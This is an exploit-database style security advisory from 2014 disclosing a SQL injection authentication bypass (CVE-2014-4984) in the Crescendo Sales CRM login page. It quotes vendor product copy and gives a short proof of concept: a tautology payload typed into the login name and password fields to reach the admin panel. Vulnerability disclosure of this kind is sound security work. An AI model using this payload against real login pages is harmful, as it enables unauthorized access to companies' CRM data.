#################################################
Crescendo - Sales CRM Authentication Bypass Vulnerability
#################################################

# Exploit Title: Crescendo - Sales CRM Authentication Bypass Vulnerability
(Sql Injection)
# Google Dork: N/A
# Date: July 15 , 2014
# Exploit Author: Monendra Sahu ( monendra.nitrr@gmail.com )
# Vendor Homepage: http://dejavuprotech.com/crecendo.php
# Tested on:Windows
# Browser Used : Google Chrome 35
# CVE: CVE-2014-4984

Vendor Information:

"Déjà Vu has introduced Crescendo – Sales CRM. Targeted towards Small &
Medium Enterprises, Crescendo is a low cost

hosted application. Crescendo is instrumental in streamlining the sales
processes like lead generation, lead tracking, lead

management, account management and keeps top management informed about the
sales pipeline. With user friendly

interface, Crescendo comes with various MIS reports represented in tabular
as well as graphical format. With the help of

Crescendo companies can take better, faster and informed decisions.

Crescendo - Sales CRM offers following modules:
Leads Management
Accounts Management
Contacts Management
Sales Forecasting
Pipeline Management
Teams Management
Targets Managements
Interactive Dashboards
Graphical & MIS Reports

Technologies employed for development of Crescendo - Sales CRM:
Front End: Asp.Net, Vb.Net
Database: MSSQL Server."


#################################################
 Issue: SQL Injection, Authentication Bypass

Risk level: High

=> The remote attacker has the possibility to execute arbitrary SQL Code.

=> The remote attacker is able to bypass the Admin authentication.

Vulnerable Url : www.site.com/login.aspx

-------------------------------------

Exploit / Proof Of Concept:

Perform a login with the following data:

URL: http://www.crescendocrm.com/login.aspx


Login Name:1'or's'='s
Password:1'or's'='s

You will be able to successfully login into admin panel

-------------------------------------

#################################################